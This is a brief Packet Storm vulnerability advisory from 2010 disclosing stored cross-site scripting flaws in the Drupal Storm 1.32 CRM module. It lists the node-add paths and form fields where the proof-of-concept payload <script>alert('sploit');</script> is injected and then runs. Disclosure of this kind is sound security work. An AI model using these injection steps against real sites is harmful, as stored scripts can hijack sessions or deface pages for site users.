Drupal Storm 1.32 Cross Site Scripting

2010-05-14T00:00:00
ID PACKETSTORM:89550
Type packetstorm
Reporter Black Packeteer
Modified 2010-05-14T00:00:00

Description

                                        
                                            `Drupal Storm module is a CRM type module that allows you to make orgs,  
people, tasks, and project. It is used on thousands of sites according to  
http://drupal.org/project/usage/storm. Storm version 1.32 have a lots of  
cross site scripting vulns.  
  
Sploits -  
* Make or view a Storm organization at ?q=node/add/stormorganization  
* <script>alert('sploit');</script> for the Fullname, address, city, state,  
phone, and taxid values  
* Save and watch scripts  
  
* Make new person, ?q=node/add/stormperson  
* <script>alert('sploit');</script> for the Name, enter and save it  
* Make new project at ?q=node/add/stormproject, use anything and save  
* Make new task at ?q=node/add/stormtask using this:  
* <script>alert('sploit');</script> for Step no. and Title  
* Go at ?q=node/add/stormticket  
* Change twice the 'Project:' drop-down to see js alerts  
  
* Make new ticket at ?q=node/add/stormticket  
* Go to Timetracking screen at ?q=node/add/stormtimetracking  
* Change the 'Project:' drop-down to view alerts  
`